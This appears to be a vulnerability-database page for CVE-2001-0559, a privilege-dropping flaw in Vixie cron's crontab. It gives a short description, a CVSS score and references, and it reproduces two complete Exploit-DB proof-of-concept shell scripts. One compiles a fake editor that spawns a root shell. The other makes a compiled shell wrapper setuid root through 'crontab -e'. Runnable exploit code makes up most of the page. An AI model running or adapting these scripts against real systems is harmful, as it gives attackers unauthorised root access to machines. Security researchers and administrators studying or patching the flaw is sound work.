CVE-2001-0559: Details

CVE-2001-0559

0.05%V3
Local
2002-03-09
04h00 +00:00
2002-02-26
09h00 +00:00

CVE Descriptions

crontab in Vixie cron 3.0.1 and earlier does not properly drop privileges after the failed parsing of a modification operation, which could allow a local attacker to gain additional privileges when an editor is called to correct the error.

CVE Information

Metrics

Metric | Score | Severity | CVSS Vector | Source
V2 | 7.2 | | AV:L/AC:L/Au:N/C:C/I:C/A:C | [email protected]

EPSS

EPSS is a scoring model that predicts the probability that a vulnerability will be exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs by their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. The percentile thus serves to compare the EPSS score of one CVE against that of other CVEs.

Exploit Information

Exploit Database EDB-ID : 20822

Publication date: 2001-05-06 22h00 +00:00
Author: Sebastian Krahmer
EDB Verified: Yes

source: https://www.securityfocus.com/bid/2687/info

Vixie cron is an implementation of the popular UNIX program that runs user-specified programs at periodic scheduled times.

When a parsing error occurs after a modification operation, crontab will fail to drop privileges correctly for subsequent modification operations. This vulnerability may be exploited to gain root privileges locally.

    #!/bin/bash

    clear
    echo ".-----------------------------------------------------------."
    echo "| Marchew.Hyperreal presents: vixie crontab exploit #728371 |"
    echo "|===========================================================|"
    echo "| Sebastian Krahmer <[email protected]> |"
    echo "| Michal Zalewski <[email protected]> |"
    echo "\`-----------------------------------------------------------'"
    echo

    test "$CRONBIN" = "" && CRONBIN=/usr/bin/crontab

    echo ">>> Using binary: $CRONBIN"
    echo -n ">>> Setuid check: "

    if [ -u $CRONBIN ]; then
      echo "PASSED"
    else
      echo "FAILED"
      echo
      exit 1
    fi

    echo -n ">>> Version check: "

    QQ=`strings $CRONBIN | grep '43 vixie Exp'`

    if [ "$QQ" = "" ]; then
      echo "FAILED"
      echo
      exit 1
    else
      echo "PASSED"
    fi

    echo ">>> Building exploit..."

    cat >edit0r.c <<_eof_
    #include <stdio.h>

    int main(int argc,char* argv[]) {
      sleep(1);
      if (geteuid()) {
        FILE* x=fopen(argv[1],"w");
        fprintf(x,"blah blah blah\n");
        fclose(x);
      } else {
        dup2(1,0);
        dup2(1,2);
        printf("\n>>> Entering rootshell, babe...\n");
        system("touch $HOME/.xploited");
        system("bash");
      }
    }
    _eof_

    gcc edit0r.c -o edit0r &>/dev/null
    rm -f edit0r.c

    if [ ! -f edit0r ]; then
      echo ">>> Cannot compile exploit."
      echo
      exit 1
    fi

    rm -f ~/.xploited

    echo ">>> Performing attack..."

    ( echo "y"; echo "n" ) | VISUAL=$PWD/edit0r $CRONBIN -e 2>/dev/null

    rm -f edit0r

    if [ -f ~/.xploited ]; then
      echo
      echo ">>> Thank you."
      rm -f ~/.xploited
      echo
      exit 0
    else
      echo
      echo ">>> Apparently I am not able to exploit it, sorry..."
      echo
      exit 1
    fi

Exploit Database EDB-ID : 20823

Publication date: 2001-07-04 22h00 +00:00
Author: cairnsc
EDB Verified: Yes

source: https://www.securityfocus.com/bid/2687/info

Vixie cron is an implementation of the popular UNIX program that runs user-specified programs at periodic scheduled times.

When a parsing error occurs after a modification operation, crontab will fail to drop privileges correctly for subsequent modification operations. This vulnerability may be exploited to gain root privileges locally.

    #!/bin/sh
    #
    # cronboom - simple proof-of-concept exploit for vixie cron version 3.1pl1
    #
    # synopsis:
    # the crontab file maintenance program (crontab) fails to drop privileges
    # before invoking the editor under certain circumstances.
    #
    # description:
    # a serialization error exists in some versions of the file maintenance
    # program, crontab. the vulnerability was introduced in versions which
    # were patched for separate vulnerability in fall of 2000 (see Bugtraq
    # ID #1960).
    #
    # when a parsing error occurs after a modification operation, crontab will
    # fail to drop privileges correctly for subsequent modification operations.
    # because the program is installed setuid root, it may be possible for a
    # local user to gain root privileges.
    #
    # affected versions:
    # cron_3.0pl1-57.2 distributed with Debian Linux 2.2.
    #
    # note that copies of the program with the patch mentioned above are likely
    # to also be vulnerable.
    #
    # references:
    # https://www.securityfocus.com/bid/2687
    #
    # 05/07/01 [email protected]

    CRONTAB=/usr/bin/crontab

    if ! test -x $CRONTAB; then
      echo "** unable to locate crontab executable, exiting"
      exit 1
    fi

    cat > vcsh.c << EOF
    #include <unistd.h>

    int main()
    {
      setuid(0);
      setgid(0);
      execl("/bin/sh", "sh", NULL);
    }
    EOF

    echo "** compiling shell wrapper as $PWD/vcsh"
    cc -o $PWD/vcsh $PWD/vcsh.c

    if ! test -x $PWD/vcsh; then
      echo "** compilation failed, exiting"
      exit 1
    fi

    echo "** creating simple exploit script as $PWD/vcex.sh"
    cat > vcex.sh << EOF
    #!/bin/sh

    sleep 1 && echo "foo" >> \$1

    if test -f $PWD/vcboom; then
      chown root.root $PWD/vcsh
      chmod 4755 $PWD/vcsh
      rm $PWD/vcboom
    else
      touch $PWD/vcboom
    fi
    EOF

    chmod 0755 $PWD/vcex.sh

    echo "** running $CRONTAB -e"
    echo "**"
    echo "** enter 'yes' at the first prompt, then enter 'no' at the second"
    echo

    (EDITOR=$PWD/vcex.sh $CRONTAB -e)

    echo
    echo "** done, the shell wrapper should be suid root"

    exit 0

Products Mentioned

Configuration 0

Paul_vixie >> Vixie_cron >> Version To (including) 3.0.1

    References

    http://www.securityfocus.com/archive/1/183029
    Tags: mailing-list, x_refsource_BUGTRAQ
    http://www.debian.org/security/2001/dsa-054
    Tags: vendor-advisory, x_refsource_DEBIAN
    http://www.securityfocus.com/bid/2687
    Tags: vdb-entry, x_refsource_BID